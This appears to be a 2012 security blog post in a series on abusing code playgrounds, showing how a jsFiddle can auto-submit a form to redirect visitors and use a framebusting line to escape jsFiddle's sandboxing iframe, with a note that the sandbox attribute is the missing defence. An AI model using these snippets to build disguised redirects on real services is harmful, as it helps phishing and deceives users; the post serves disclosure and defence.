Although the examples in this series were trivial, they could easily be leveraged as a malicious attack platform. As CodePen begins to roll out more of their own features, especially those that people pay for, these techniques will become more exploitable. The root problem is that the guard runs as ordinary page script and shares the global object with the code it is meant to restrain, so anything it stores on window can be overwritten; isolation has to come from the browser (a sandboxed iframe) rather than from script.
Return to Part 1: Overview or Part 2: jsFiddle.
Thursday, December 13, 2012
Weaponizing Pt 2: Framebusting jsFiddle
In part 1 of this series, we looked at how we could use code playgrounds as open redirect services. One of our targets was jsFiddle. jsFiddle attempted to avoid some of our redirection problems by sandboxing a user's code in an iframe. On the surface, this seemed to solve the problem: by constantly leaving a jsFiddle banner on the page, the user is always reminded that they're viewing a fiddle.
At this point, the attacker needs to escape their horrible sandbox prison. Incidentally, this has been done before: framebusting to the rescue. Framebusting is traditionally a technique used to prevent UI redressing, essentially allowing a victim page to bust out of a potentially malicious iframe. We can use this technique to defeat jsFiddle's sandboxing iframe.
Again, we'll add our redirection code to the HTML area of our fiddle:
<form id="fun" action="http://www.gawker.com" />
<script>document.getElementById("fun").submit();</script>
If you run this fiddle now, you'll see the Gawker homepage, along with a jsFiddle banner along the top of the page. Now we can use JavaScript to escape the shackles of our imprisonment, improving our redirect. By changing our code to the following, we can bust out of our iframe and redirect properly:
<script>if( self != top ) {top.location = self.location;}</script>
<form id="fun" action="http://www.gawker.com" />
<script>document.getElementById("fun").submit();</script>
This extra line checks whether the window our script runs in (self) is the top-level window (top). Because our script runs inside a frame, the two differ, so we set the top window's location to our own; that replaces the whole page, banner included, with the frame's content, and our redirect then runs as normal.
Summary
This again reiterates how difficult it is to control client-side functionality in a language as robust as JavaScript. When JavaScript controls the DOM, and the DOM can have embedded JavaScript, it only takes one oversight to take full control of content. The frame only contains the fiddle because nothing stops it navigating its parent; an iframe carrying the sandbox attribute without allow-top-navigation makes the top.location assignment fail with a SecurityError, which is the control that was missing.